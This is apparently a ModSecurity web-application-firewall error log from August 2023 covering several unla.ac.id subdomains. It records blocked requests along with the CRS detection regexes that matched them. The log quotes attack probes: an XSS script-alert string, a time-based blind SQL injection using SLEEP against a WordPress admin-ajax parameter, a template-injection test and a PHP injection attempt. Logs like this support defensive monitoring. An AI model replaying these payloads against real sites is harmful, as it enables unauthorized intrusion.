[Tue Aug 29 10:13:55.972668 2023] [:error] [pid 64569] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZO1ic8Co-f0AAPw51hsAAAAF"]
[Tue Aug 29 10:13:57.390503 2023] [:error] [pid 64569] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZO1idcCo-f0AAPw51hwAAAAF"]
[Tue Aug 29 10:14:01.145344 2023] [:error] [pid 64569] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZO1iecCo-f0AAPw51h0AAAAF"]
[Tue Aug 29 10:14:03.285313 2023] [:error] [pid 64569] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZO1ie8Co-f0AAPw51h4AAAAF"]
[Tue Aug 29 10:14:13.293412 2023] [:error] [pid 64564] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZO1ihcCo-f0AAPw0chcAAAAE"]
[Tue Aug 29 10:14:15.589721 2023] [:error] [pid 64564] [client 114.142.172.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: \\x22:\\x22d5abe498-e found within REQUEST_COOKIES:ab.storage.sessionId.7af503ae-0c84-478f-98b0-ecfff5d67750: {\\x22g\\x22:\\x22d5abe498-e712-3024-52a3-14c0b4d4b602\\x22,\\x22e\\x22:2169216518069,\\x22c\\x22:1660057119021,\\x22l\\x22:1669216518069}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZO1ih8Co-f0AAPw0chgAAAAE"]
[Tue Aug 29 10:18:23.449027 2023] [:error] [pid 64673] [client 36.69.12.4] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "182.255.4.121_d67e5c77ccb4028457e4bbb31078a8f9aaae79dc"): Internal error [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZO1jf8Co-f0AAPyhVA4AAAAT"]
[Tue Aug 29 10:36:50.715085 2023] [:error] [pid 64915] [client 89.208.136.177] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-22.php"] [unique_id "ZO1n0sCo-f0AAP2T@KUAAAAC"]
[Tue Aug 29 11:05:31.273489 2023] [:error] [pid 65446] [client 36.79.161.167] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.79.6.68_4eca0dfdfab95bb7a540e2850c4a5f213a388d7c"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/website/upload_files.js"] [unique_id "ZO1ui8Co-f0AAP@m2toAAAAL"]
[Tue Aug 29 11:05:31.273594 2023] [:error] [pid 65426] [client 36.79.161.167] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.79.6.68_4eca0dfdfab95bb7a540e2850c4a5f213a388d7c"): Internal error [hostname "www.unla.ac.id"] [uri "/application/frontend/website/file_list.js"] [unique_id "ZO1ui8Co-f0AAP@SlMIAAAAN"]
[Tue Aug 29 11:18:44.512884 2023] [:error] [pid 668] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO1xpMCo-f0AAAKcIxsAAAAA"]
[Tue Aug 29 11:18:44.672542 2023] [:error] [pid 679] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO1xpMCo-f0AAAKnPlMAAAAN"]
[Tue Aug 29 11:21:06.600063 2023] [:error] [pid 721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO1yMsCo-f0AAALRG9AAAAAQ"]
[Tue Aug 29 11:21:12.543970 2023] [:error] [pid 728] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO1yOMCo-f0AAALY@XMAAAAU"]
[Tue Aug 29 11:21:12.659916 2023] [:error] [pid 678] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO1yOMCo-f0AAAKmJuEAAAAH"]
[Tue Aug 29 11:21:12.886390 2023] [:error] [pid 611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO1yOMCo-f0AAAJjrWkAAAAK"]
[Tue Aug 29 11:21:19.053701 2023] [:error] [pid 663] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO1yP8Co-f0AAAKXUioAAAAG"]
[Tue Aug 29 11:21:19.247175 2023] [:error] [pid 663] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO1yP8Co-f0AAAKXUisAAAAG"]
[Tue Aug 29 11:21:19.531646 2023] [:error] [pid 611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO1yP8Co-f0AAAJjrWsAAAAK"]
[Tue Aug 29 11:21:19.831937 2023] [:error] [pid 729] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO1yP8Co-f0AAALZnUkAAAAV"]
[Tue Aug 29 11:21:20.586543 2023] [:error] [pid 729] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO1yQMCo-f0AAALZnUoAAAAV"]
[Tue Aug 29 11:21:22.008984 2023] [:error] [pid 729] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO1yQsCo-f0AAALZnUsAAAAV"]
[Tue Aug 29 11:30:10.943191 2023] [:error] [pid 920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10UsCo-f0AAAOYZhQAAAAB"]
[Tue Aug 29 11:30:11.089153 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAO-1ncAAAAI"]
[Tue Aug 29 11:30:11.114173 2023] [:error] [pid 960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAPAexYAAAAL"]
[Tue Aug 29 11:30:11.240430 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10U8Co-f0AAANjpv4AAAAT"]
[Tue Aug 29 11:30:11.283372 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAOM4TYAAAAU"]
[Tue Aug 29 11:30:11.396857 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10U8Co-f0AAAOKNk8AAAAK"]
[Tue Aug 29 11:30:11.419838 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAOKNlAAAAAK"]
[Tue Aug 29 11:30:11.689284 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAN5YEoAAAAN"]
